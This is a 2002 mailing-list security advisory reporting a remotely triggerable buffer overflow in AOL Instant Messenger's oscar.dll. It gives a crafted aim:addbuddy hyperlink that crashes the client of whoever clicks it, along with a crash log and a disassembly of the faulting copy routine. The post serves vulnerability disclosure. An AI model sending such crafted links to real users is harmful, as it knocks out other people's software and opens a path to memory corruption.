Vulnerability Development mailing list archives
AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow
From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Thu, 7 Mar 2002 07:23:25 -0500
.--------.
/ Bugs \
+-----------------------------------------------------------------------.
:
Affected : All versions of AIM including the beta 4.8.2646 :
Type : Local/Remote Buffer Oveflow :
Date : 29-02-2002 :
Author : NtWaK0 & Recon @ www.SafeHack.com :
+-----------------------------------------------------------------------.
We think this was not reported. Nothing was found publicaly about this.
+------------------.
Crash of AIM Client \
+--------------------`--------------------------------------------------.
:
+-----------. :
Disclaimer \ :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on :
experiments though it may be false. The opinions expressed in this :
advisory and program are my own and NOT of any company. :
In Fact I do not work for no one at the present time. :
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------------. :
Brief History \ :
+---------------`-------------------------------------------------------.
If you are running any version of AIM (Aol Instant Messenger) you are :
affected with this crash, vendor has been informed. :
:
AOL's Instant Messenger client (AIM) has contain a buffer overflow :
vulnerability in the file oscar.dll. :
Instant Messenger allows AOL users to send short messages between :
its users. A buffer overflow in oscar.dll in al register. :
:
+---------------------------+ :
Test OS Applications <<< :
+---------------------------+ :
Tested on all version of Microsoft Windows Family of OS with the latest :
beta version of AIM 4.8.2646 :
:
+-----------. :
The Problem \ :
+-------------`---------------------------------------------------------.
Normaly I do not use AIM. But a friend of mine "Recon" told me about a :
strange problem he found. Since I am curiouse I did install AIM and done:
some test to find out what was going on again thanks Recon. :
:
AOL's Instant Messenger client (AIM) has contain a buffer overflow :
vulnerability in the file oscar.dll. :
Instant Messenger allows AOL users to send short messages between :
its users. A buffer overflow in oscar.dll in al register. :
:
The buffer Overflow will happen if you send a special crafted message to:
an AIM user. :
:
:
:
To see the buffer Overflow do the following steps: :
1- Make sure you have AIM 4.8.2646 installed :
2- Open a new IM window and click the link button to setup a hyperlink :
for your buddy. :
4- Input the exact text into the link :
aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,:
12345678,12345678,12345678,12345678,12345678,12345678&groupname= :
12345678,12345678,12345678,12345678,12345678,12345678,12345678 :
,12345678,12345678,12345678, :
:
5- The text can be anything as long as it meets the format of 8 :
characters for each word to add as a screenname and a groupname, the :
instances should be 11 for the screenname and 10 for the groupname :
6- A memory dump will occurs as soon as the hyperlink is clicked by :
either side (You or your buddy). :
:
This was taken after the buffer overflow occured from Drwatson log :
:
function: o_strncpy :
1218b4f9 8b4508 mov eax,[ebp+0x8] ss:00c :
1218b4fc 3b450c cmp eax,[ebp+0xc] ss:00c :
1218b4ff 7419 jz LoadRendezvousString+0x39f6 ( :
1218b501 8a06 mov al,[esi] :
1218b503 8807 mov [edi],al :
1218b505 47 inc edi :
1218b506 ff4508 inc dword ptr [ebp+0x8] ss:00c :
1218b509 46 inc esi :
1218b50a 43 inc ebx :
1218b50b 8a06 mov al,[esi] :
FAULT ->1218b50d 8807 mov [edi],al :
1218b50f 47 inc edi :
1218b510 ff4508 inc dword ptr [ebp+0x8] ss:00c :
1218b513 46 inc esi :
1218b514 43 inc ebx :
1218b515 803e00 cmp byte ptr [esi],0x0 :
1218b518 75cf jnz LoadRendezvousString+0x3bc5 ( :
1218b51a 8b4d0c mov ecx,[ebp+0xc] ss:00c :
1218b51d 3bf9 cmp edi,ecx :
1218b51f 7312 jnb OscoreUseCurrentAcceleratorTable+ :
1218b521 2bcf sub ecx,edi :
1218b523 33c0 xor eax,eax :
:
Below is a portion of the asm code for the file oscar.dll :
=============================================== :
.text:1218B4E9 loc_1218B4E9: ; CODE XREF: o_strncpy+61j :
.text:1218B4E9 cmp edi, [ebp+lpsz] :
.text:1218B4EC jnb short loc_1218B533 :
.text:1218B4EE push esi ; lpsz :
.text:1218B4EF call ds:CharNextA
.text:1218B4F5 cmp eax, ebx
.text:1218B4F7 jnz short loc_1218B50B
.text:1218B4F9 mov eax, [ebp+arg_0]
.text:1218B4FC cmp eax, [ebp+lpsz]
.text:1218B4FF jz short loc_1218B51A
.text:1218B501 mov al, [esi]
.text:1218B503 mov [edi], al
.text:1218B505 inc edi
.text:1218B506 inc [ebp+arg_0]
.text:1218B509 inc esi
.text:1218B50A inc ebx
===============================================
.text:1218B50B loc_1218B50B: ; CODE XREF: o_strncpy+40j
.text:1218B50B mov al, [esi]
.text:1218B50D mov [edi], al ; <<<---HERE IS THE P
.text:1218B50F inc edi
.text:1218B510 inc [ebp+arg_0]
.text:1218B513 inc esi
.text:1218B514 inc ebx
.text:1218B515 cmp byte ptr [esi], 0
.text:1218B518 jnz short loc_1218B4E9
=================================================
.text:1218B51A loc_1218B51A: ; CODE XREF: o_s
.text:1218B51A ; o_strncpy+48j
.text:1218B51A mov ecx, [ebp+lpsz]
.text:1218B51D cmp edi, ecx
.text:1218B51F jnb short loc_1218B533
.text:1218B521 sub ecx, edi
.text:1218B523 xor eax, eax
.text:1218B525 mov edx, ecx
.text:1218B527 shr ecx, 2
.text:1218B52A repe stosd
.text:1218B52C mov ecx, edx
.text:1218B52E and ecx, 3
.text:1218B531 repe stosb
.text:1218B533
==================================================
:
:
:
Here is the stack variables :
=========================== :
00000000 s db 4 dup(?) :
00000004 r db 4 dup(?) :
00000008 arg_0 dd ? :
0000000C lpsz dd ? ; offset (FFFFFFFF) :
00000010 arg_8 dd ? :
:
This issue has not been tested on third party software that supports :
the oscar protocol :
:
+------------. :
The Solution \ :
+--------------`--------------------------------------------------------.
We could not located AIM email to send them this issue. :
+-----------------------------------------------------------------------.
________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good www.SafeHack.com |
Je Pense, Donc Je Suis \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :) --(")--
RFCs are meant to be read and followedÂ…:) /`\ NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow -=-
Current thread:
- AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow Adonis.No.Spam (Mar 07)
- Re: AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow Douglas Pichardo (Mar 08)
- <Possible follow-ups>
- RE: AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow John Adair (Mar 07)